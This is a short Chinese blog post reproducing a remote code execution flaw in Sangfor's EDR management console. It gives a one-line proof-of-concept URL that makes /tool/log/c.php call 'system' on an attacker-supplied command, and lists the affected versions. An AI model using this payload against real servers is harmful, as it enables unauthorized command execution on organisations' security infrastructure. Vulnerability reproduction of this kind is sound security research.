深信服终端检测响应平台(EDR)RCE复现

发表于   |   分类于 网络安全   |   暂无评论   |  字数 270

EDR简介

终端检测响应平台(EDR)是深信服公司提供的一套终端安全解决方案,方案由轻量级的端点安全软件(Agent)和管理平台(管理平台)共同组成。
EDR 的管理平台支持统一的终端资产管理、终端病毒查杀、终端合规检查,支持微隔离的访问控制策略统一管理,支持对安全事件的一键隔离处置,以及热点事件 IOC 的全网威胁定位。
端点软件支持防病毒功能、入侵防御功能、防火墙隔离功能、数据信息采集上报、一键处置等。深信服的 EDR 产品也支持与 AC、SIP、AF、SOC、X-central 产品的联动协同响应,形成新一代的安全防护体系。

20200818更新官方说明

https://mp.weixin.qq.com/s/nAEqjeCm34t1yD5Kh7ZJxA
EDR UI界面
dnZyg1.jpg

RCE复现

POC:https://xxx.xxx/tool/log/c.php?strip_slashes=system&host=id
默认控制台为443端口,若有更改自行加上端口。
dne6iQ.jpg
dnesIg.jpg

影响范围

我这边用最新的版本复现失败,后跟厂商确认,最新版本3.2.21已修复该问题,受影响的应该是EDR v3.2.16、v3.2.17和v3.2.19。
HW第一天就是精彩。
添加新评论